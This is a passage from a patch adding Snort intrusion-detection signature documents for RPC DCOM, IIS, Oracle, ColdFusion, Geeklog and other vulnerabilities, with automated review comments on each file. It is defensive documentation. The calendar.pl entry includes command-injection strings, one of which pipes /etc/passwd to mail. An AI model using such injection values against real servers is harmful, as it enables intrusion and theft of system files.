+to cause a DoS condition to occur. It may also be possible for an
+attacker to execute code of their choosing on a vulnerable host.
+
+This issue may also affect Microsoft Windows Metafile Format (.wmf)
+files also.
+
+--
+Affected Systems:
+	Microsoft Windows XP Home, Professional and Media Center Edition
+	Microsoft Windows XP Home and Professional SP-1
+
+--
+Attack Scenarios:
+An attacker might supply a specially crafted request for such a file
+that might cause the error condiion to occur.
+
+--
+Ease of Attack:
+Moderate/Difficult
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
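Review bot: typo in Attack Scenarios: "condiion" should be "condition". In Detailed Information, "Windows Extended Metafile Format (.emf)" should be "Windows Enhanced Metafile Format (.emf)", which is what EMF stands for, and "This issue may also affect Microsoft Windows Metafile Format (.wmf) files also." repeats "also"; suggest "This issue may also affect Microsoft Windows Metafile Format (.wmf) files." Minor: "Apply the appropriate vendor supplied patches" lacks a terminal period.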
--- /dev/null
+++ b/doc/signatures/3413.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3413
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
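Review bot: the Attack Scenarios paragraph ("An attacker may make a request for a file with an overly long filename via a network share.") does not match Detailed Information, which describes malformed data sent in a DCOM request via RPC; if the overlong filename is the payload carried inside that RPC request, say so, otherwise reword the scenario to match. Typo in Ease of Attack: "Expoit" should be "Exploit". Additional References is empty for a widely documented Microsoft issue; suggest adding the vendor bulletin.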
--- /dev/null
+++ b/doc/signatures/3438.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3438
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
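Review bot: apart from the Sid, this file is a verbatim copy of doc/signatures/3413.txt earlier in this patch, so nothing tells the reader what distinguishes sid 3438 from sid 3413 (a different transport, port, encoding or request?). Suggest adding a sentence to Summary or Detailed Information stating what this rule specifically matches, so an analyst knows why one fired and not the other. The same "Expoit" typo and the same mismatch between Attack Scenarios (overlong filename via a network share) and Detailed Information (malformed RPC data) are present here as in 3413.txt.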
--- /dev/null
+++ b/doc/signatures/1455.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+1455
+
+--
+Summary: 
+This event is generated when an attempt is made to access a web 
+application that may lead to exploitation of the application.
+
+--
+Impact: 
+Potentially harmful execution of binaries through perl open()
+
+--
+Detailed Information: 
+An open source calendar perl script by Matt Kruse, Allows commands to be
+executed without input verification using the perl open() function. ie
+/cgi-bin/calendar.pl place the string "|ping 127.0.0.1|" in the
+configuration file field, this executes the command "ping 127.0.0.1" 
+
+--
+Affected Systems:
+	Matt Kruse Calendar Script version 2.2.
+
+--
+Attack Scenarios: 
+An unauthenticated user can execute arbitrary programs on the server by
+accessing calendar.pl and inputting commands such as "|mail
+/etc/passwd|" into the configuration file field.
+
+--
+Ease of Attack: 
+Simple. No exploit software required.
+
+--
+False Positives: 
+If your webserver has pages by the name of calendar.pl this rule will
+fire often. Many sites now use calendar applications and this rule may 
+generate a large number of false positives, it does not distinguish 
+between perl cgi applications and php scripts. Consider tuning this rule
+for your site if it is generating a large number of false positives. If 
+you use a calendar application, consider changing the name of the script
+to something other than "calendar.pl".
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Download a newer version of the cgi 
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Snort documentation contributed by Aaron Navratil (Initial Research)
+Snort documentation contributed by Josh Gray (Edits)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://online.securityfocus.com/bid/1215
+
+--
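Review bot: the first sentence of Detailed Information has a stray comma and capital: "An open source calendar perl script by Matt Kruse, Allows commands to be executed" should read "An open source calendar perl script by Matt Kruse allows commands to be executed", and "ie" should be "i.e." with a full sentence following it. Corrective Action ("Download a newer version of the cgi") is vague and lacks a period; since Affected Systems names version 2.2, suggest "Upgrade to a version of the Calendar Script later than 2.2." Minor: the False Positives advice to rename the script to something other than calendar.pl is a detection-evasion tweak for the rule, not a fix for the vulnerability; consider saying so to avoid it being read as remediation.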
--- /dev/null
+++ b/doc/signatures/928.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+928
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
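Review bot: product name is spelled two ways, "ColdFusion" in Summary and Affected Systems and "Coldfusion" in Detailed Information; use "ColdFusion" throughout. As with the other generic web-server entries in this patch, the Summary never says which ColdFusion path or request sid 928 matches, so an analyst cannot tell what was detected; suggest one sentence naming it. Minor: "the attackers choosing" should read "the attacker's choosing".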
--- /dev/null
+++ b/doc/signatures/2129.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2129
+
+
+--
+Summary:
+This event is generated when an attempt is made to access nsiislog.dll on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Possible buffer overrun leading to arbitrary code execution.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access nsiislog.dll on a host running Microsoft Internet Information Server (IIS).
+
+The attacker may be trying to overflow a buffer using nsiislog.dll. This can present the attacker with the opportunity to execute arbitrary code of his choice on the vulnerable system. The vulnerability occurs when requests for Server Side Includes are not properly checked by the web server.
+
+--
+Affected Systems:
+Any host using IIS 5.0.
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer and then proceed to execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Technet:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-018.asp
+
+--
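Review bot: the last sentence of Detailed Information, "The vulnerability occurs when requests for Server Side Includes are not properly checked by the web server.", does not describe the component named in the rule: nsiislog.dll is the Windows Media Services logging ISAPI extension, not the IIS server-side-include handler. Please verify the description and the Microsoft Technet reference against the nsiislog.dll issue and drop or correct the SSI sentence. Formatting: "Sid: 2129" is on one line followed by two blank lines, unlike the two-line "Sid:" / "<number>" form used elsewhere in the patch. Minor: "arbitrary code of his choice" should match the "of their choosing" wording used in the other files.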
--- /dev/null
+++ b/doc/signatures/2676.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2676
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_instantiation
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
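Review bot: the procedure name in Detailed Information is broken across lines with the sentence period on its own line: "vulnerability in the procedure drop_site_instantiation" / ". This procedure is included in" / "dbms_repcat_rgt." should be joined into "vulnerability in the procedure drop_site_instantiation. This procedure is included in dbms_repcat_rgt." Also "Oracle Oracle9i" in Affected Systems repeats the vendor name, and "Apply the appropriate vendor supplied patch" lacks a terminal period.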
--- /dev/null
+++ b/doc/signatures/1064.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1064
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
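Review bot: this file is a verbatim copy of doc/signatures/1184.txt earlier in the patch apart from the Sid, so nothing tells the reader what sid 1064 matches or how it differs from sid 1184; suggest replacing the generic Summary with one sentence naming the specific request or URI this rule detects. Minor: "the attackers choosing" should read "the attacker's choosing".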
--- /dev/null
+++ b/doc/signatures/100000698.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000698
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "BXCP" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "where" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "where" parameter in the "index.php" script used by the "BXCP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BXCP
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
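Review bot: the Summary ends with "may indicate that an exploitation attempt has been attempted", which is redundant; suggest "may indicate that an exploitation attempt has been made". Typo in Detailed Information: "ona web server" should be "on a web server". The third Detailed Information paragraph is the generic CGI credentials-validation boilerplate and does not describe the SQL injection issue in the "where" parameter; suggest dropping it. Formatting: two leading blank lines before "Rule:", a missing blank line before "--" after the Sid, Affected Systems and Contributors sections, and a trailing blank line after the final "--" are all inconsistent with the other files in the patch.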
--- /dev/null
+++ b/doc/signatures/991.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+991
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to brute force changes or discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+--
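Review bot: grammar in Detailed Information: "discover whether a specific account name exist" should read "discover whether a specific account name exists". Formatting: there are two blank lines after the Sid and a stray blank line between "Affected Systems:" and "Microsoft IIS 4.0", unlike the rest of the patch; the Impact and Detailed Information paragraphs also contain double spaces after periods. The two references (CVE and Bugtraq) are a good model for the other entries in this patch that leave Additional References empty.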
--- /dev/null
+++ b/doc/signatures/1680.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1680
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
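Review bot: the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit." in Detailed Information appears to be copied from a telnet rule document and does not fit a command sent to an Oracle database port; suggest removing it. Attack Scenarios ("Simple. These are Oracle database commands.") is an ease rating rather than a scenario, and the Summary never says which command the rule matches. The $ORACLE_PORTS / "any" advice is given twice, once in Detailed Information and again in False Negatives; consolidate it in one place. Formatting: the two Corrective Action sentences run together without a blank line and the second ("Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise") lacks a period; suggest "...legitimate session, then investigate the server for signs of compromise."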
--- /dev/null
+++ b/doc/signatures/2076.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2076
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Mambo Site Server.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
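Review bot: Ease of Attack is left empty; the Attack Scenarios text ("appending a valid extension used for an image file") implies no special tooling is needed, so a rating with that justification should be filled in. The Affected Systems entry "Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA" duplicates the vendor name. In Detailed Information, "laxe checking" should be "lax checking", and "do not prevent the upload of files with image extensions" is ambiguous: from the attack scenario it means files whose only claim to be an image is the appended extension, which is worth saying outright.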
--- /dev/null
+++ b/doc/signatures/1643.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1643
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
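Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "the attackers choosing" (Impact and Detailed Information) should be "the attacker's choosing". The Summary speaks of "a known vulnerability" yet Additional References is empty and nothing in the file names the CGI application concerned; either cite the vulnerability this Sid targets or reword the Summary to say the rule matches a generic CGI access pattern.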
--- /dev/null
+++ b/doc/signatures/100000739.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000739
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "IPofUrl.Examine.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "IPofUrl.Examine.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
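Review bot: the Summary ends "may indicate that an exploitation attempt has been attempted", which is tautological; "may indicate an exploitation attempt" suffices. The file opens with two blank lines before "Rule:" and omits the blank line between the Sid value and the following "--" separator that the other signature files use; align it with them. "running ona web server" should be "running on a web server". The third paragraph of Detailed Information is the generic CGI-credentials text and does not describe the remote file include via "$_CONF[path]" in "IPofUrl.Examine.class.php" that the first paragraph covers; consider dropping it or tying it to that parameter.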
--- /dev/null
+++ b/doc/signatures/1115.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1115
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
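Review bot: "the attackers choosing" in Impact should be "the attacker's choosing". The Summary says "a known vulnerability" while Detailed Information concedes that "the attack scenarios are legion" and Additional References is empty; either cite the vulnerability this rule targets or reword the Summary to state that the rule matches a generic web-server attack pattern.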
--- /dev/null
+++ b/doc/signatures/3050.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3050
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
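Review bot: Additional References is empty although Detailed Information describes a specific Ethereal ACL/ACE size-handling flaw affecting "Ethereal 0.10.7 and prior"; the vendor advisory for that issue should be cited. Several header lines ("Rule: ", "Sid: ", "Summary: ", "Impact: ", "Attack Scenarios: ", "Ease of Attack: ", "Corrective Action: ", "Contributors: " and the "-- " separators) carry trailing whitespace that the other files do not. The first Corrective Action line "Apply the appropriate vendor supplied patch" lacks a terminating period.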
--- /dev/null
+++ b/doc/signatures/1148.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1148
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
